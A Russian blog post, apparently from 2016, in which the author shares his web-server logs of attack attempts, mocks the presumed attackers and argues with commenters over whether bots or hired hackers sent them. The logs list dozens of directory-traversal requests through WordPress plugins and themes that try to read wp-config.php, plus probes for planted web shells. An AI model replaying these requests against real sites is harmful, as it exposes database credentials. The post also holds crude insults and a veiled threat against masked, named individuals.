Толик Панков
hex_laden
............ .................. ................

October 2025
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

Толик Панков [userpic]
Какеры

Додик с Петухеллом и ваши виртуальные прихвостни, даже не пытайтесь...
Заглянул тут в логи:

20161105_155.133.82.230.log
Attempts: 1 - Request URL: tolik-punkoff.com/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
Attempts: 2 - Request URL: tolik-punkoff.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
Attempts: 3 - Request URL: tolik-punkoff.com/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php
Attempts: 4 - Request URL: tolik-punkoff.com/magmi/web/plugin_upload.php
Attempts: 5 - Request URL: tolik-punkoff.com/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=1
Attempts: 6 - Request URL: tolik-punkoff.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
Attempts: 7 - Request URL: tolik-punkoff.com/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
Attempts: 8 - Request URL: tolik-punkoff.com/wp-content/plugins/tierra-billboard-manager/tierra-billboard-playlist.php?id=../../../../../../wp-config.php
Attempts: 9 - Request URL: tolik-punkoff.com/wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
Attempts: 10 - Request URL: tolik-punkoff.com/wp-content/assets/themes/plugins/uploadify/uploadify.php
Attempts: 11 - Request URL: tolik-punkoff.com/wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
Attempts: 12 - Request URL: tolik-punkoff.com/wp-content/force-download.php?file=../wp-config.php
Attempts: 13 - Request URL: tolik-punkoff.com/wp-content/plugins/indeed-membership-pro/authorize_response.php
Attempts: 14 - Request URL: tolik-punkoff.com/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=../../../../wp-config.php
Attempts: 15 - Request URL: tolik-punkoff.com/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
Attempts: 16 - Request URL: tolik-punkoff.com/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
Attempts: 17 - Request URL: tolik-punkoff.com/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
Attempts: 18 - Request URL: tolik-punkoff.com/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
Attempts: 19 - Request URL: tolik-punkoff.com/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=../../../wp-config.php
Attempts: 20 - Request URL: tolik-punkoff.com/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
Attempts: 21 - Request URL: tolik-punkoff.com/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
Attempts: 22 - Request URL: tolik-punkoff.com/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
Attempts: 23 - Request URL: tolik-punkoff.com/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
Attempts: 24 - Request URL: tolik-punkoff.com/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
Attempts: 25 - Request URL: tolik-punkoff.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
Attempts: 26 - Request URL: tolik-punkoff.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download
Attempts: 27 - Request URL: tolik-punkoff.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
Attempts: 28 - Request URL: tolik-punkoff.com/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php
Attempts: 29 - Request URL: tolik-punkoff.com/wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php
Attempts: 30 - Request URL: tolik-punkoff.com/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
Attempts: 31 - Request URL: tolik-punkoff.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php
Attempts: 32 - Request URL: tolik-punkoff.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
Attempts: 33 - Request URL: tolik-punkoff.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
Attempts: 34 - Request URL: tolik-punkoff.com/wp-content/themes/awake/lib/scripts/dl-skin.php
Attempts: 35 - Request URL: tolik-punkoff.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
Attempts: 36 - Request URL: tolik-punkoff.com/wp-content/themes/construct/lib/scripts/dl-skin.php
Attempts: 37 - Request URL: tolik-punkoff.com/wp-content/themes/dejavu/lib/scripts/dl-skin.php
Attempts: 38 - Request URL: tolik-punkoff.com/wp-content/themes/echelon/lib/scripts/dl-skin.php
Attempts: 39 - Request URL: tolik-punkoff.com/wp-content/themes/elegance/lib/scripts/dl-skin.php
Attempts: 40 - Request URL: tolik-punkoff.com/wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php
Attempts: 41 - Request URL: tolik-punkoff.com/wp-content/themes/felis/download.php?file=../../../wp-config.php
Attempts: 42 - Request URL: tolik-punkoff.com/wp-content/themes/fusion/lib/scripts/dl-skin.php
Attempts: 43 - Request URL: tolik-punkoff.com/wp-content/themes/infocus/lib/scripts/dl-skin.php
Attempts: 44 - Request URL: tolik-punkoff.com/wp-content/themes/infocus/lib/scripts/dl-skin.php../../../../../wp-config.php
Attempts: 45 - Request URL: tolik-punkoff.com/wp-content/themes/infocus2/lib/scripts/dl-skin.php
Attempts: 46 - Request URL: tolik-punkoff.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
Attempts: 47 - Request URL: tolik-punkoff.com/wp-content/themes/lote27/download.php?download=../../../wp-config.php
Attempts: 48 - Request URL: tolik-punkoff.com/wp-content/themes/method/lib/scripts/dl-skin.php
Attempts: 49 - Request URL: tolik-punkoff.com/wp-content/themes/modular/lib/scripts/dl-skin.php
Attempts: 50 - Request URL: tolik-punkoff.com/wp-content/themes/myriad/lib/scripts/dl-skin.php
Attempts: 51 - Request URL: tolik-punkoff.com/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
Attempts: 52 - Request URL: tolik-punkoff.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
Attempts: 53 - Request URL: tolik-punkoff.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php
Attempts: 54 - Request URL: tolik-punkoff.com/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
Attempts: 55 - Request URL: tolik-punkoff.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
Attempts: 56 - Request URL: tolik-punkoff.com/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php

20161104_195.154.242.146.log.txt:
Attempts: 1 - Request URL: tolik-punkoff.com/modules/up.php?up=hous
Attempts: 2 - Request URL: tolik-punkoff.com/modules/simpleslideshow/uploadimage.php

20161104_195.154.181.168.log.txt
Attempts: 1 - Request URL: tolik-punkoff.com/wp-content/uploads/92334914.php
Attempts: 2 - Request URL: tolik-punkoff.com/license.php
Attempts: 3 - Request URL: tolik-punkoff.com/12573463.php
Attempts: 4 - Request URL: tolik-punkoff.com/wp-content/plugins/revslider/temp/update_extract/07553600.php
Attempts: 5 - Request URL: tolik-punkoff.com/uploadify/uploadify.php?folder=/
Attempts: 6 - Request URL: tolik-punkoff.com/32629526.php
Attempts: 7 - Request URL: tolik-punkoff.com/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=OTMwMTcyOTMucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d
Attempts: 8 - Request URL: tolik-punkoff.com/wp-content/plugins/93017293.php


Не пытайтесь, ребята, не ваш уровень.
1. Нет у меня таких плагинов, даже похожих нет.
2. О нулевых уязвимостях меня в корпоративном блоге предупреждают (ну скупаем мы их массово, такая работа)
3. Все забэкаплено. Даже если и хакнете, то насрать. 24 часа на восстановление, в договоре прописано.
4. Уведете домен, как нашисты у Назлобу, хуй с ним, будет новый домен, нам на выдачу в гугле, тащемта, насрать. Нас из других источников финансируют, нам SEO пофигу.
5. Г. Д-ченко и Д. С-нов, вас же предупреждали, что интернеты вам следует отключить, и больше туда не захаживать. Можем ведь, как Хуйло сказало, и специалистов по обрезанию (не подумайте, кабелей) послать.

Это репост заметки из моего блога на сайте http://tolik-punkoff.com
Оригинал заметки находится здесь: http://tolik-punkoff.com/2016/11/21/kakery/

Comments

А зачем фамилии прятать? Ты одно время боролся с каким-то карельским, вроде, чиновником-хуеплетом. Это он, штоле?

Он не карельский, он московский.
Но заметка не про них, потому фамилии и спрятаны. Они же нанимают дебилов-студентов, которые взломами занимаются, и если что в суде будут отмазываться, "не виноватая я, он сам пришел". А так вроде и упомянул, им понятно, а суд (когда состоится) на заметку внимания не обратит. Чисто юридическая фишка, прямых доказательств-то нет, но мне понятно.

(Anonymous)

Скорее всего это не хакеры, а боты со скриптами, которые тупо сканируют весь диапозон доменом и часто даже не проверяют наличие WP.

Это боты, которых используют какеры.
А так я конечно хуже всех (Радио Радонеж и все дела), но даже меня им похакать слабо, я ржу.

Немного нагадили пару раз, но это совсем херня, напугали хостера поддельным письмом от РКН (спасла визитка Яроша, хостинг Украинский).

(Anonymous)

в попытке порвать тебе ачько через твой стандалон ничего плохого не вижу

я тоже, кроме того, что не порвать. принципиально.
Ачько мне порвать можно только физически, а не байтиками в интернетах.
Хотите - попробуйте.
Вы вон даже в ссуд зассали, в отличии от того же Навального, хехе.

эти боты ходят абсолютно ко всем, не мегаломаньячь.

(Anonymous)

тошка необучаемый же, через месяц опять напишет
необучаемый

тошка

И кто в результате необучаемый?
Вы же даже ментов не могли нормально натравить, на тошку. Хе-хе-хе.

вполне возможно, что и ко всем. я обычно атаки не заказываю и на хакерских форумах не тусуюсь, но также вероятно, что кто-то нанял студентов/школьников, чтоб сломать именно меня. Ну типа виртуально "опустить", ибо, во-первых, на этот сайт атак уж СЛИШКОМ много (хотя сайт-то непосещаемый личный говнобложег), во-вторых, были относительно успешные (не вошли, но нашли логин FTP, который, как бы не афишируется и нигде не отображается), в-третьих, пугали хостера и/или менеджеров (напрямую с хостером не общаюсь, а менеджеры могли что-то не так понять, ибо люди). Так что вообще бабушка надвое сказала. Особо не мегаломаньячу. Вряд ли петухелл, а вот додик, москаль с украинской фамилией, или сраный татупед серgay, вполне быть могут...

на мой хост боты повалили чуть ли не раньше, чем я его сделал, и до сих пор ходят. при том, что я всех больших и нескольких маленьких поисковых пауков отшибаю фаером (отшибал, сейчас лень ip чинить). в количествах вполне промышленных, тупо перебирая всё на свете, даже не парясь проверками на наличие. и так со всеми. от тех, которые в фтп пытались влезть, я даже несколько новых слов узнал. ;-)

с учетом того, что логин FTP формируется хостером не совсем простым образом, то это, как минимум, странно. Плюс есть относительно удачные попытки, отшибленные машинкой. Не хочу в открытую разглашать подробности.
Так скажем, может там 70% случайных ботов и где-то 30 целенаправленных атак.

ну и плюс запугивания...
в общем, пост, скорее о том, что мы бдим, видим, а вы, сцуки, лишний раз не досаждайте. Все-равно наебетесь.